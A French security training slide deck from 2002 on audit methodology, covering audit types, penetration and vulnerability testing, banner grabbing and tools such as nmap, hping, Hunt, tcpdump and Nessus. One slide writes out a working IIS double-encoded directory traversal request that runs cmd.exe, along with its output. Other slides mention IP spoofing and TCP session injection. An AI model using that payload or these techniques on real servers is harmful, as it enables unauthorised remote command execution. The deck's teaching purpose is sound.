Progression Sécurité & réseaux TCP/IP - Cours1 : Révision réseaux

Slides:



Advertisements
Présentations similaires
L’Essentiel sur… La sécurité de la VoIP
Advertisements

Qualité de Service sur Linux
GESTION D’IMPRISSION SOUS WINDOWS & LINUX
Hygiène de la messagerie chez Microsoft
Quelques éléments sur la sécurité informatique au LRI
VLC UMVF Fiche Veille Statut Logiciel gratuit, open source
Une solution personnalisable et extensible
L’outil Nmap-Stateful
14 - Adresse IP et interfaces. Plan détude 1)Adresse IP dune interface 1)Résolution de nom vers IP statique 1)Service DNS 1)Spécification des interfaces.
- Couche 7 - Couche application. Sommaire 1)Introduction 1)DNS 1)FTP et TFTP 1)HTTP 1)SNMP 1)SMTP 1)Telnet.
DUDIN Aymeric MARINO Andrès
Patrick PROY Sébastien MATHON DESS Réseaux - promotion 1999/2000
Les Firewall DESS Réseaux 2000/2001
ISP/ASP ISP ASP Conclusion DESS Réseaux 2000/2001
Présentation CLUSIR 8 janvier 2002
La politique de Sécurité
2-Generalites FTP:Protocole De transfert de fichiers sur un réseau TCP/IP. Permet de copier des fichiers depuis ou vers un autre ordinateur du reseaux,d'administrer.
FLSI602 Génie Informatique et Réseaux
réalisé par: FreeWays Security Club
Gestion des risques Contrôle Interne
SECURITE DU SYSTEME D’INFORMATION (SSI)
Module 1 : Préparation de l'administration d'un serveur
Scanning.
1 Sécurité Informatique : Proxy Présenter par : Mounir GRARI.
IDS : Intrusion Detection System
CRUSOE Researches Présentation Azwalaro – – © Crusoe Researches.
Le protocole FTP.
RE161 IDS : Intrusion Detection System Le trafic habituel qui entre dans votre réseau sert à : Résoudre des requêtes DNS Accéder à des pages web La messagerie.
Les NAC Network Access Control
Initiation au web dynamique
Commutation de niveau 5 Guillaume CASSIN Charles DESMOULINS 24 Mars 2001.
Vue d'ensemble Configuration d'adresses IP
Sécurisation d’un réseau Chariot Nicolas Rémi Jean-François.
Test d ’un système de détection d ’intrusions réseaux (NIDS)
Audit de réseau. Audit réseau Responsable : Jean-François RODRIGUEZ Objectif : tester les failles d’une machine ou d’un réseau Outil : nessus Audit réseau.
Travail de diplôme José Garrido Professeur : Philippe Freddi Explorer Internet en toute sécurité Surf Safe SPY INTERNET.
Sommaire Dans ce chapitre, nous aborderons :
Expose sur « logiciel teamviewer »
Ethereal Analyseur de trafic réseau Romain AUFFRET Maxime HERVÉ Soutenance orale de Réseaux.
Plan Définitions et exemples Composants de cluster
Cours de programmation web
Couche Transport (4) Routeur Messages entre A et B
Déni de Service Distribué Distributed Denial of Service
Configuration d’un serveur DNS sous GNU/Linux : BIND
Les listes de contrôle d’accès
Institut Supérieur d’Informatique
Back Orifice Scénario en 3 étapes - Préparation & envoi - Infection & Installation - Prise de contrôle - Détections Possibles - Net-Based - Host-Based.
Utilisation avancée de linux Réseau Démarrage et arrêt.
Advisor Advanced IP Présentation Télémaintenance Télésurveillance.
Dossier n°1 Structure et Fonctionnement d'un micro-ordinateur.
Auvray Vincent Blanchy François Bonmariage Nicolas Mélon Laurent
Département de physique/Infotronique
Les Réseaux informatiques
Les Réseaux Informatiques Clients & Serveurs Le protocole FTP Laurent JEANPIERRE DEUST AMMILoR.
Groupe 3 De Greef Didier Oozeer Tommy Piette Marc Renard Guy
Maxly MADLON Consultant NES
Offre de service Sécurité des systèmes d’information
Mise en place de translation d’adresses NAT/PAT
IPSec Formation.
Clifton Hughes Développeur Global Support Automation Microsoft Corporation Présentation du pare-feu de connexion Internet Microsoft Windows XP Clifton.
SNMP Simple Network Management Protocol
Sécurité : Architecture et Firewall
Logiciel de surveillance de réseaux informatique
Référant : Osman SALEM GAOUA Lilia 15/12/2011.
V- Identification des ordinateurs sur le réseau
Analyse d’une architecture réseau
Sécurité Réseau Alain AINA AFNOG 2003.
Portfolio.
Chapitre8 Configuration de l'adressage TCP/IP et de la résolution de noms Module S41.
Scanning. Responsable : Remy FABREGES Objectif : découvrir des failles de sécurité, s’introduire dans la passerelle Outils : nmap, rooktits.
Transcription de la présentation:

Progression Sécurité & réseaux TCP/IP - Cours1 : Révision réseaux Méthodologie d’audit 15/11/2002 Ciefa Poly-informatique 20/06/2002 - Ciefa Poly-informatique

Ciefa Poly-informatique Plan du cours Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Introduction L’audit de sécurité est la première étape de la démarche conduisant à la définition et à la mise en place d’une politique sécurité. But : donner à tout responsable de système d’information, une image pertinente de l’état de sécurité de ses moyens informatiques face aux menaces et risques les plus couramment référencés dans l’état de l’art de la sécurité des systèmes d’information. Destiné à relever et lister les vulnérabilités éventuelles du système d’information. Porte donc à la fois sur : l’organisation l’implémentation des moyens informatiques l’exploitation de ces moyens 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Partie 1 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Différents types d’audit Audit de vérification => analyse de l’état du système Audit d’agrément => conformité à un référentiel prédéfini Audit intrusif => recherche active des failles 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Audit de vérification Analyse de l’état d’un système ou d’un réseau - Organisation (personnel, procédures) - Configuration (réseau, organisationnelle) - Exploitation (ressources) - Compétence (résultats en accords avec moyens mis en œuvre) - Protocoles utilisés Vérification par rapport : - aux bonnes pratiques du métier - à la politique de sécurité - aux besoins exprimés par le demandeur Indépendant de tout travail existant ; permet une bonne idée de la situation 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Audit d’agrément Développement d’un document d’exigences de sécurité ou règles d’exploitation exhaustives - Consensus entre les acteurs : utilisateurs, administrateurs, sécurité… - Spécifique à une architecture, un ensemble de produits ou un environnement précis - Accompagné d’un cahier d’agrément expliquant comment vérifier les exigences => Formalisme L’agrément vérifie le respect des exigences ou règles par rapport au référentiel 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Audit intrusif Le seul audit dont le résultat sensibilise les hiérarchies - Recherche active de failles - Base de données de vulnérabilités Approche par la tentative d’intrusion - Réalisée sans les exploitants - Dépendant de la compétence de l’auditeur - Dans un environnement plus large Mêmes outils que ces attaquants malveillants 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Nécessité d’un audit ? En France : 90% des réseaux informatiques sont vulnérables 65% des entreprises sont victimes d’intrusions 95% de ces intrusions ne sont même pas détectées En 2001, les attaques informatiques ont représenté un coût global de 1600 milliards de dollars. En 2001, 85% des entreprises et des services publics américains ont rapporté une intrusion informatique telle qu'un vol d'information propriétaire, une fraude financière, l'intrusion de personnes extérieures dans leur système, une attaque de déni de service ou un sabotage de leurs données ou réseau. 40% des entreprises interrogées ont rapporté une intrusion par un tiers extérieur (20% en 1997). 38% ont détecté une attaque de type Déni de service (24% en 1998). (Source: 2001 Computer Crime & Security Survey, Computer Security Institute). 15/11/2002 Ciefa Poly-informatique

Exemple d’audit : architecture réseau Objectif : déterminer les points faibles d’une architecture Méthodologie : - Analyse fonctionnelle - Plan d’adressage, cloisonnement IP - Rôle des sous réseaux et de chaque composant - Redondance des protections - Choix des matériels et logiciels - Recherche des éléments sur lesquels repose la sécurité - Recherche des communications avec l’extérieur - Plan de secours - Résistance au déni de service - … 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Tests d’intrusion Définition : tentative de compromission de la sécurité Types de tests d’intrusion : - de l’extérieur : test d’intrusion externe - de l’intérieur : audit intrusif interne Sans connaissance : intrus externe à l’entreprise Avec connaissances internes : reproduit le cas d’un employé malveillant => Souvent réalisés après résultats de l’audit pour limiter les dégâts (DoS) 15/11/2002 Ciefa Poly-informatique

Tests de vulnérabilité Vulnérabilités : - faille dans un logiciel - erreur de configuration d’un équipement Outils : - Nessus : tout en un - Recherche et tests de ports ouverts : Nmap, hping Objectifs : - Trouver, à distance et de manière automatique, des services ouverts - Tenter de déterminer si une vulnérabilité connue est présente 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Partie 2 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Utilisation des ports Ports TCP : plupart des services classiques souvent ouverts (21, 22, 23, 25, 80, …) Ports UDP : scan de port fermé => flag RST facilement filtrable par firewall… => seul moyen est alors de tester les applications courantes ftp Scan NMAP option –0 sur chaque port => assurance de bonnes indications sur OS (dans cas de routeur adsl ou autre…) 15/11/2002 Ciefa Poly-informatique

Recherche des bannières Service FTP : $ ftp 137.194.200.214 Connected to 137.194.200.214. 220 FTP server (Hummingbird Communications Ltd. (HCLFTPD) Version 6.1.0.0) ready. Service SSH : $ telnet 137.194.200.214 22 Trying 137.194.200.214... Connected to 137.194.200.214. Escape character is '^]'. SSH-1.99-OpenSSH_3.0.2p1 Debian 1:3.0.2p1-9 Service Telnet : $ telnet 137.194.200.214 Debian GNU/Linux 2.2 serveur.ssir.com Login : Service SMTP : $ telnet 137.194.200.214 25 ... 220 serveur.ssir.com ESMTP Exim 3.12 #1 Mon, 10 Jun 2002 22:56:32 +0200 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Faille serveur IIS =>un serveur IIS peut être sensible aux attaques de type URL encodée $ echo "GET /scripts/..%255c..%255c..%255cwinnt/System32/cmd.exe?/c+dir+c:\\ HTTP/1.0 " | stunnel -c -r 137.194.200.214:443 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Server: Microsoft-IIS/5.0 Date: Fri, 17 Jun 2002 19:47:35 GMT Content-Type: application/octet-stream Le volume dans le lecteur C n'a pas de nom. Le numero de serie du volume est 9C5F-0FCD Repertoire de c:\ 01/01/2000 01:19 <DIR> Documents and Settings 01/01/2000 01:19 <DIR> I386 10/06/2002 21:44 <DIR> Inetpub 05/05/2002 19:17 <DIR> My Music 17/06/2002 19:26 <DIR> Program Files 17/05/2002 16:18 600 PUTTY.RND 25/04/2002 06:21 <DIR> TEMP 18/06/2002 20:46 <DIR> WINNT 1 fichier(s) 1á223á476 octets 7 Rep(s) 3á385á342á976 octets libres 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Autres pistes En cas de présence d’un routeur passerelle connue du réseau : essai adresse interne pour IP Spoofing… Travail sur les TTL (pour déterminer OS, architecture, …) Passage mode passif du FTP (pasv) pour trouver adresse interne par exemple… Exploitation services comme SMTP, etc… 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Partie 3 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Outils d’audit et d’attaque Nmap Hping Hunt Nessus Tcpdump Ethereal 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NMAP Développé et disponible sur http://www.insecure.org Scanner de ports et de machines Référence de la prise d’empreinte Utilisation : « nmap <options> machine » 15/11/2002 Ciefa Poly-informatique

NMAP : principales options nmap –O : OS Fingerprint nmap --osscan_guess : Option non référencée donnant les résultats probables de la prise d’empreinte en cas d’échec nmap –P0 : pas de ping (utile derrière un firewall) nmap –PT : TCP Ping nmap –p 1:1024 : Liste de ports à scanner 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NMAP : osscan_guess # nmap --osscan_guess -sS -O -p 19-26 -n -P0 192.168.148.31 Starting nmap V. 2.54BETA5 ( www.insecure.org/nmap/ ) Interesting ports on (192.168.148.31): (The 6 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 25/tcp open smtp TCP Sequence Prediction: Class=random positive increments Difficulty=2830 (Medium) Aggressive OS guesses: FreeBSD 3.2-STABLE (91%), Microsoft NT 4.0 Server SP5 + 2047 Hotfixes (90%), Windows 2000 RC1 through final release (90%), Windows 2000 Professional, Build 2128 (90%), Windows Millenium Edition v4.90.3000 (90%), HP-UX 10.20 (89%), Cisco IOS 12.0(3.3)S (perhaps a 7200) (88%), F5labs Big/IP HA TCP/IP Load Balancer (BSDI kernel/x86) (88%) No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi). 15/11/2002 Ciefa Poly-informatique

NMAP : principaux types de scan nmap –sT (Scan par défaut): connexion TCP nmap –sS : TCP SYN scan nmap –sF : TCP FIN scan nmap –sU : UDP scan nmap –sP : ping scan utilisé pour scanner des plages d’adresses nmap –s0 : scan de protocoles transportés par IP 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HPING Boîte à outils permettant de créer des paquets IP Permet de tester finement des règles de filtrage Analyse les paquets retour précisément 15/11/2002 Ciefa Poly-informatique

HPING : principales options hping –SFRA : bits SYN,FIN,RST,ACK Hping –1 : ICMP (-C pour type) hping –2 : UDP hping –c N : N paquets (défaut : illimité) hping –T : Traceroute 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HPING 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HPING 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HUNT Outil de surveillance réseau évolué Permet de surveiller un réseau en reconstituant les sessions TCP Permet d’insérer des paquets dans une session TCP ( Génère une tempête ACK) 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique TCPDUMP Sniffer réseau en ligne de commande Fonctionnalités de filtrage avancées (librairie pcap) Exemple : tcpdump –i eth0 –p host 192.168.2.3 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique TCPDUMP 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NESSUS Sonde d’audit en réseau permettant de : Scanner les vulnérabilités réseau Scanner les vulnérabilités applicatives (bannières, CGI, buffer-overflows,…) Élément actif qui réalise les attaques (les plus nocives sont désactivées par défaut)  Attention aux DoS sur les sondes de détection 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NESSUS Disponible sur http://www.nessus.org Clients pour Unix, Windows Serveur pour Unix seulement 15/11/2002 Ciefa Poly-informatique

NESSUS : Fonctionnement 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NESSUS Mise à jour régulière des vulnérabilités Utilise un langage de script spécifique  Personnalisation possible 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client # # The script code starts here port = get_kb_item("Services/www"); if(!port)port = 80; banner = get_kb_item(string("www/banner/", port)); if(!banner) { if(get_port_state(port)) soc = open_sock_tcp(port); if(soc) req = string("GET / HTTP/1.0\r\n\r\n"); send(socket:soc, data:req); banner = recv(socket:soc, length:1024); close(soc); } if(banner) if(egrep(pattern:"^Server: Zope\/Zope 2\.((0\..*)|(1\.[0-6]))", string:banner)) security_hole(port); 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique